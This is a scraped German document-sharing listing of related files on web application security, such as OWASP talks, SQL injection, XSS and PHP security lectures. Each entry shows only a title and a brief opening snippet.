HÄRTUNG VON WEB-APPLIKATIONEN MIT OPEN-SOURCE-SOFTWARE. Münchener Open-Source-Treffen, Florian Maier, 23.05.2014 HÄRTUNG VON WEB-APPLIKATIONEN MIT OPEN-SOURCE-SOFTWARE Münchener Open-Source-Treffen, Florian Maier, 23.05.2014 ÜBER MICH 34 Jahre, verheiratet Open Source Enthusiast seit 1997 Beruflich seit 2001 Sicherheit,

Mehr

Wie steht es um die Sicherheit in Software?

Wie steht es um die Sicherheit in Software? Wie steht es um die Sicherheit in Software? Einführung Sicherheit in heutigen Softwareprodukten Typische Fehler in Software Übersicht OWASP Top 10 Kategorien Praktischer Teil Hacking Demo Einblick in die

Mehr

Audit von Authentifizierungsverfahren

Audit von Authentifizierungsverfahren Audit von Authentifizierungsverfahren Walter Sprenger, Compass Security AG Compass Security AG Glärnischstrasse 7 Postfach 1628 CH-8640 Rapperswil Tel +41 55-214 41 60 Fax +41 55-214 41 61 team@csnc.ch

Mehr

Web Application Security Testing

Web Application Security Testing Lehrstuhl für Rechnernetze und Internet Wilhelm-Schickard-Institut für Informatik Universität Tübingen Web Application Security Testing Carl-Daniel Hailfinger Betreuer: Pavel Laskov Ziele des Vortrags

Mehr

IT-Sicherheit Angriffsziele und -methoden Teil 2

IT-Sicherheit Angriffsziele und -methoden Teil 2 Karl Martin Kern IT-Sicherheit Angriffsziele und -methoden Teil 2 http://www.xkcd.com/424/ Buffer Overflows 2 Buffer Overflows Ausnutzen unzureichender Eingabevalidierung Begrenzter Speicherbereich wird

Mehr

Webapplikationssicherheit (inkl. Livehack) TUGA 15

Webapplikationssicherheit (inkl. Livehack) TUGA 15 Webapplikationssicherheit (inkl. Livehack) TUGA 15 Advisor for your Information Security Version: 1.0 Autor: Thomas Kerbl Verantwortlich: Thomas Kerbl Datum: 05. Dezember 2008 Vertraulichkeitsstufe: Öffentlich

Mehr

Gefahr durch Cookies. Antonio Kulhanek. Security Consultant Dipl. Techniker HF, Kommunikationstechnik MCSE, ITIL Foundation kulhanek@gosecurity.

Gefahr durch Cookies. Antonio Kulhanek. Security Consultant Dipl. Techniker HF, Kommunikationstechnik MCSE, ITIL Foundation kulhanek@gosecurity. Gefahr durch Cookies Antonio Kulhanek Security Consultant Dipl. Techniker HF, Kommunikationstechnik MCSE, ITIL Foundation kulhanek@gosecurity.ch Rechtliche Hinweise Art. 143 StGB Unbefugte Datenbeschaffung

Mehr

FileBox Solution. Compass Security AG. Cyber Defense AG Werkstrasse 20 Postfach 2038 CH-8645 Jona

FileBox Solution. Compass Security AG. Cyber Defense AG Werkstrasse 20 Postfach 2038 CH-8645 Jona Compass Security Cyber Defense AG Werkstrasse 20 T +41 55 214 41 60 F +41 55 214 41 61 admin@csnc.ch FileBox Solution Name des Dokumentes: FileBox_WhitePaper_de.doc Version: v2.0 Autor: Ivan Bütler Unternehmen:

Mehr

Ajax, aber sicher! Carsten Eilers

Ajax, aber sicher! Carsten Eilers Ajax, aber sicher! Carsten Eilers Berater für IT-Sicherheit Autor About Security Standpunkt Sicherheit Schwachstellen-Datenbank Security Aktuell auf entwickler.de Vorstellung Carsten Eilers, www.ceilers-it.de

Mehr

Money for Nothing... and Bits4free

Money for Nothing... and Bits4free Money for Nothing... and Bits4free 8.8.2011 Gilbert Wondracek, gilbert@iseclab.org Hacker & Co Begriff hat je nach Kontext andere Bedeutung, Ursprung: 50er Jahre, MIT Ausnutzen von Funktionalität die vom

Mehr

Sichere Entwicklung und gängige Schwachstellen in eigenentwickelten SAP-Web- Anwendungen. OWASP Nürnberg, 13.10.09

Sichere Entwicklung und gängige Schwachstellen in eigenentwickelten SAP-Web- Anwendungen. OWASP Nürnberg, 13.10.09 AppSec Germany 2009 AppSec Germany 2009 Conference http://www.owasp.org/index.php/germany Sichere Entwicklung und gängige Schwachstellen in eigenentwickelten SAP-Web- Anwendungen Nürnberg, 13.10.09 Sebastian

Mehr

verstehen lernen, wie der Angreifer denkt diese Methoden selbst anwenden Allerdings: Mitdenken, nicht nur blindes ausprobieren Außerdem:

verstehen lernen, wie der Angreifer denkt diese Methoden selbst anwenden Allerdings: Mitdenken, nicht nur blindes ausprobieren Außerdem: !! "!!##$ %& es gibt keine 100 %ige Sicherheit Fehler zu machen ist menschlich man muss es so gut wie möglich machen es ist GROB FAHRLÄSSIG es nicht einmal zu versuchen Ziel: Methoden entwickeln, die Sicherheit

Mehr

Was eine WAF (nicht) kann. Mirko Dziadzka OWASP Stammtisch München 24.11.2009

Was eine WAF (nicht) kann. Mirko Dziadzka OWASP Stammtisch München 24.11.2009 Was eine WAF (nicht) kann Mirko Dziadzka OWASP Stammtisch München 24.11.2009 Inhalt Meine (subjektive) Meinung was eine WAF können sollte und was nicht Offen für andere Meinungen und Diskussion Disclaimer:

Mehr

Konzept eines Datenbankprototypen. 30.06.2003 Folie 1 Daniel Gander / Gerhard Schrotter

Konzept eines Datenbankprototypen. 30.06.2003 Folie 1 Daniel Gander / Gerhard Schrotter Konzept eines Datenbankprototypen 30.06.2003 Folie 1 Daniel Gander / Gerhard Schrotter Inhalt (1) Projektvorstellung & Projektzeitplan Softwarekomponenten Detailierte Beschreibung der System Bausteine

Mehr

7363 - Web-basierte Anwendungen 4750 Web-Engineering

7363 - Web-basierte Anwendungen 4750 Web-Engineering Fachhochschule Wiesbaden - FB Design, Informatik, Medien 7363 - Web-basierte Anwendungen 4750 Web-Engineering Eine Vertiefungsveranstaltung 28.01.2009 2005, 2008 H. Werntges, Studienbereich Informatik,

Mehr

ESA SECURITY MANAGER. Whitepaper zur Dokumentation der Funktionsweise

ESA SECURITY MANAGER. Whitepaper zur Dokumentation der Funktionsweise ESA SECURITY MANAGER Whitepaper zur Dokumentation der Funktionsweise INHALTSVERZEICHNIS 1 Einführung... 3 1.1 Motivation für den ESA Security Manager... 3 1.2 Voraussetzungen... 3 1.3 Zielgruppe... 3 2

Mehr

Open for Business - Open to Attack? Walter Lender, Geschäftsführer, Visonys IT-Security Software GesmbH

Open for Business - Open to Attack? Walter Lender, Geschäftsführer, Visonys IT-Security Software GesmbH Open for Business - Open to Attack? Walter Lender, Geschäftsführer, Visonys IT-Security Software GesmbH 2 Open for Business - Open to Attack? 75% aller Angriffe zielen auf Webanwendungen (Gartner, ISS)

Mehr

When your browser turns against you Stealing local files

When your browser turns against you Stealing local files Information Security When your browser turns against you Stealing local files Eine Präsentation von Alexander Inführ whoami Alexander Inführ Information Security FH. St Pölten Internet Explorer Tester

Mehr

SQL-Injection in the news Stand: 17.06.2006 24:00

SQL-Injection in the news Stand: 17.06.2006 24:00 Vernetzte Unternehmen I SQL-Injection Prof. Dr. H. Strack, Dipl.-Inf.(FH) Ch. Karich SQL-Injection in the news Stand: 17.06.2006 24:00 Heise-Newsticker: 02.06.06: SQL-Injection-Lücke in MySQL gestopft

Mehr

SQL-Injection by. SQL Injection Teil 2 R. Mirzaev & J. Kresslein 1

SQL-Injection by. SQL Injection Teil 2 R. Mirzaev & J. Kresslein 1 SQL-Injection by SQL Injection Teil 2 R. Mirzaev & J. Kresslein 1 Inhalt Schon bekannte Angriffsformen? User-Agent based SQL Injection + Demo Zeitbasierte SQL Injection Blind SQL Injection + Demo PostgreSQL

Mehr

TimeMachine. Time CGI. Version 1.5. Stand 04.12.2013. Dokument: time.odt. Berger EDV Service Tulbeckstr. 33 80339 München

TimeMachine. Time CGI. Version 1.5. Stand 04.12.2013. Dokument: time.odt. Berger EDV Service Tulbeckstr. 33 80339 München Time CGI Version 1.5 Stand 04.12.2013 TimeMachine Dokument: time.odt Berger EDV Service Tulbeckstr. 33 80339 München Fon +49 89 13945642 Mail rb@bergertime.de Versionsangaben Autor Version Datum Kommentar

Mehr

2. Interaktive Web Seiten. action in Formularen. Formular. Superglobale Variablen $ POST, $ GET und $ REQUEST. GET und POST

2. Interaktive Web Seiten. action in Formularen. Formular. Superglobale Variablen $ POST, $ GET und $ REQUEST. GET und POST 2. Interaktive Web Seiten GET und POST Die Übertragungsmethoden GET und POST sind im http Protokoll definiert: POST: gibt an, dass sich weitere Daten im Körper der übertragenen Nachricht befinden: z.b.

Mehr

SecureNet GmbH 2009. For personal use only. Distribution not allowed.

SecureNet GmbH 2009. For personal use only. Distribution not allowed. 1 Die Datenbank als Erfüllungsgehilfe für Datendiebe Eine Kurzeinführung in Injection-Angriffe Stream Security Ralf Reinhardt, 19.11.2009 2 Eine Kurzeinführung in Injection-Angriffe Inhalte HTML-Injection

Mehr

Datensicherheit. Vorlesung 7: 29.5.2015. Sommersemester 2015 h_da. Heiko Weber, Lehrbeauftragter

Datensicherheit. Vorlesung 7: 29.5.2015. Sommersemester 2015 h_da. Heiko Weber, Lehrbeauftragter Datensicherheit Vorlesung 7: 29.5.2015 Sommersemester 2015 h_da Heiko Weber, Lehrbeauftragter Inhalt 1. Einführung & Grundlagen der Datensicherheit 2. Identitäten / Authentifizierung / Passwörter 3. Kryptografie

Mehr

OWASP. Open Web Application Security Project. Dr. Ingo Hanke. IDEAS Information & Design Applications. Dr. Ingo Hanke

OWASP. Open Web Application Security Project. Dr. Ingo Hanke. IDEAS Information & Design Applications. Dr. Ingo Hanke OWASP IDEAS Information & Design Applications O WA S P O WA S P WA S ist Web Application Security? Part I: Web Application Security Aufgabe 1 Werte identifizieren Personenbezogene Daten Sachdaten Prozesse

Mehr

PHP-Schwachstellen und deren Ausnutzung

PHP-Schwachstellen und deren Ausnutzung PHP-Schwachstellen und deren Ausnutzung 44. DFN Betriebstagung / 7. Februar 2006 DFN-CERT Services GmbH Jan Kohlrausch / CSIRT Gliederung Grundlagen HTTP und PHP Anatomie typischer Schwachstellen in PHP-Skripten

Mehr

Live Hacking auf eine Citrix Umgebung

Live Hacking auf eine Citrix Umgebung Live Hacking auf eine Citrix Umgebung Ron Ott + Andreas Wisler Security-Consultants GO OUT Production GmbH www.gosecurity.ch GO OUT Production GmbH Gegründet 1999 9 Mitarbeiter Dienstleistungen: 1 Einleitung

Mehr

Internet: Was ist das? - Routing

Internet: Was ist das? - Routing Internet: Was ist das? - Routing Auch Router Server Router Client ClientServer? Grundlagen Internet Sicherheit Angriffe Schutz Internet Map, The Opte Project Internet: Was ist das? - Netzwerk Peer-to-Peer

Mehr

Sicherheit in Rich Internet Applications

Sicherheit in Rich Internet Applications Sicherheit in Rich Internet Applications Florian Kelbert 14.02.2008 Seite 2 Sicherheit in Rich Internet Applications Florian Kelbert 14.02.2008 Inhaltsverzeichnis Grundlagen Ajax und Mashups Adobe Flash-Player

Mehr

7.11.2006. int ConcatBuffers(char *buf1, char *buf2, size_t len1, size_t len2) {

7.11.2006. int ConcatBuffers(char *buf1, char *buf2, size_t len1, size_t len2) { Universität Mannheim Lehrstuhl für Praktische Informatik 1 Prof. Dr. Felix C. Freiling Dipl.-Inform. Martin Mink Dipl.-Inform. Thorsten Holz Vorlesung Angewandte IT-Sicherheit Herbstsemester 2006 Übung

Mehr

Datenbanksysteme SS 2007

Datenbanksysteme SS 2007 Datenbanksysteme SS 2007 Frank Köster (Oliver Vornberger) Institut für Informatik Universität Osnabrück Kapitel 9c: Datenbankapplikationen Architektur einer Web-Applikation mit Servlets, JSPs und JavaBeans

Mehr

PHPIDS Vortrag. PHP Usergroup Frankfurt am Main 14. Februar 2008. Autor: Tom Klingenberg. Web & Applikation

PHPIDS Vortrag. PHP Usergroup Frankfurt am Main 14. Februar 2008. Autor: Tom Klingenberg. Web & Applikation PHPIDS Vortrag PHP Usergroup Frankfurt am Main 14. Februar 2008 Autor: Tom Klingenberg Web & Applikation PHP (PHP: Braucht hier nicht erklärt werden.) IDS IDS: Intrusion Detection System Einbruchsmeldesystem

Mehr

Hackerpraktikum SS 202

Hackerpraktikum SS 202 Hackerpraktikum SS 202 Philipp Schwarte, Lars Fischer Universität Siegen April 17, 2012 Philipp Schwarte, Lars Fischer 1/18 Organisation wöchentliche Übung mit Vorlesungsanteil alle zwei Wochen neue Aufgaben

Mehr

Cross Site Scripting (XSS)

Cross Site Scripting (XSS) Konstruktion sicherer Anwendungssoftware Cross Site Scripting (XSS) Stephan Uhlmann 31.08.2003 Copyright (c) 2003 Stephan Uhlmann Permission is granted to copy, distribute and/or modify this

Mehr

Webapplikationen wirklich sicher?! 10. Mai 2006 IT-TRENDS Sicherheit Zentrum für IT-Sicherheit, Bochum

Webapplikationen wirklich sicher?! 10. Mai 2006 IT-TRENDS Sicherheit Zentrum für IT-Sicherheit, Bochum Webapplikationen wirklich sicher? 10. Mai 2006 IT-TRENDS Sicherheit Zentrum für IT-Sicherheit, Bochum Die wachsende Bedrohung durch Web-Angriffen Test, durchgeführt von PSINet und Pansec 2 "dummy" Web-Sites

Mehr

SQL. SQL = Structured Query Language, ist eine standardisierte Sprache zum Gebrauch im Zusammenhang mit Datenbanken.

SQL. SQL = Structured Query Language, ist eine standardisierte Sprache zum Gebrauch im Zusammenhang mit Datenbanken. Vorlesungsteil SQL Grundlagen - 1 / 8 - SQL SQL = Structured Query Language, ist eine standardisierte Sprache zum Gebrauch im Zusammenhang mit Datenbanken. Auf einem Server (Rechner im Netz, der Dienste

Mehr

Web 2.0 Software-Architekturen

Web 2.0 Software-Architekturen Web 2.0 Software-Architekturen Servlets als Controller einer MVC Web Architektur Prof. Dr. Nikolaus Wulff HTTP und HTML Das HyperText TransferProtokoll (HTTP) beschreibt eine einfache verbindungslose Kommunikation,

Mehr

PHP-Security. Aleksander Paravac. watz@lug-bamberg.de http://www.lug-bamberg.de. Aleksander Paravac (GNU/Linux User Group Bamberg/Forchheim) 1 / 27

PHP-Security. Aleksander Paravac. watz@lug-bamberg.de http://www.lug-bamberg.de. Aleksander Paravac (GNU/Linux User Group Bamberg/Forchheim) 1 / 27 PHP-Security Aleksander Paravac watz@lug-bamberg.de http://www.lug-bamberg.de Aleksander Paravac (GNU/Linux User Group Bamberg/Forchheim) 1 / 27 Übersicht 1 Motivation 2 Einsatz von PHP auf dem Webserver

Mehr

Reverse Cloud. Michael Weisgerber. Channel Systems Engineer DACH September 2013

Reverse Cloud. Michael Weisgerber. Channel Systems Engineer DACH September 2013 Reverse Cloud Michael Weisgerber Channel Systems Engineer DACH September 2013 Öffentliche Wahrnehmung - heute Flame Duqu Stuxnet Page 2 2011 Palo Alto Networks. Proprietary and Confidential. Öffentliche

Mehr

Internet Information Services v6.0

Internet Information Services v6.0 Internet Information Services v6.0 IIS History Evolution von IIS: V1.0 kostenlos auf der CeBit 1996 verteilt V2.0 Teil von Windows NT 4.0 V3.0 Als Update in SP3 von NT4.0 integriert V4.0 Windows NT 4.0

Mehr

Fortgeschrittene Servlet- Techniken. Ralf Gitzel ralf_gitzel@hotmail.de

Fortgeschrittene Servlet- Techniken. Ralf Gitzel ralf_gitzel@hotmail.de Fortgeschrittene Servlet- Techniken Ralf Gitzel ralf_gitzel@hotmail.de 1 Themenübersicht Ralf Gitzel ralf_gitzel@hotmail.de 2 Übersicht Servlet Initialisierung Attribute und Gültigkeitsbereiche Sessions

Mehr